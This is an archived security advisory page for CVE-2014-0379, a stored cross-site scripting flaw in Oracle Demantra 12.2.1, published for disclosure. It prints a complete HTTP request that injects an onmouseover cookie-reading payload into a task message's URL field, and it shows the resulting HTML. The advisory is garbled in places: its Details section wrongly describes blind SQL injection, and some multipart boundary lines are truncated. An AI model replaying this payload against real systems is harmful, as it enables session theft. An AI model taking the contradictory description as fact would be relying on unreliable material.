what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Demantra 12.2.1 Stored Cross Site Scripting

Oracle Demantra 12.2.1 Stored Cross Site Scripting
Posted Mar 2, 2014
Authored by Oliver Gruskovnjak | Site portcullis-security.com

Oracle Demantra version 12.2.1 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-0379
SHA-256 | 89044605cbc525d513b4e2c2d308ae8b79dc792e462e488af746f24809fa0679

Oracle Demantra 12.2.1 Stored Cross Site Scripting

Change Mirror Download
Vulnerability title: Stored Cross-site Scripting in Oracle Demantra
CVE: CVE-2014-0379
Vendor: Oracle
Product: Demantra
Affected version: 12.2.1
Fixed version: 12.2.3
Reported by: Oliver Gruskovnjak

Details:

The Oracle Demantra application is vulnerable to SQL injection.

An attacker with access to the vulnerable pages could manipulate the
queries being sent to the database, potentially enabling them to extract
sensitive information or modify content within the application.

In this particular instance, exploitation was more difficult as the
results of the attack had to inferred based on the pages returned, often
referred to as "blind" SQL Injection.

Exploit:

Request:

POST /demantra/TaskSender HTTP/1.1
Host: www.target.com:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291
Content-Length: 3093

-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUsersVector"

389
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="selectedUserList"

389;
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="message"

asdasda
----------97315614820331578362291
Content-Disposition: form-data; name="description"

asdasdasdas
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="url"

aaa"onmouseover="alert(document.cookie)
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmail"

1
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTime"

08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTime"

08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_dueTimeHours"

14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_alertTimeHours"

08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="hidden_escalateUserList"


-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="combination"


-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTime"

08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTime"

08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="tkn"

187120466014305
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream


-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedDueTime"

08/02/2013
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="dueTimeHours"

14:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="localizedAlertTime"

08/02/2013
---------------12454397315614820331578362291
Content-Disposition: form-data; name="alertTimeHours"

08:30
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="escalateUserList"


-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="sendEmailCheckbox"

on
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="x"

50
-----------------------------12454397315614820331578362291
Content-Disposition: form-data; name="y"

7
-----------------------------12454397315614820331578362291--

Resulting Code in page:

<!-- Message -->

<td class="columnCellMessage">

<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">

<b>asdasda</b>




Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0379/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close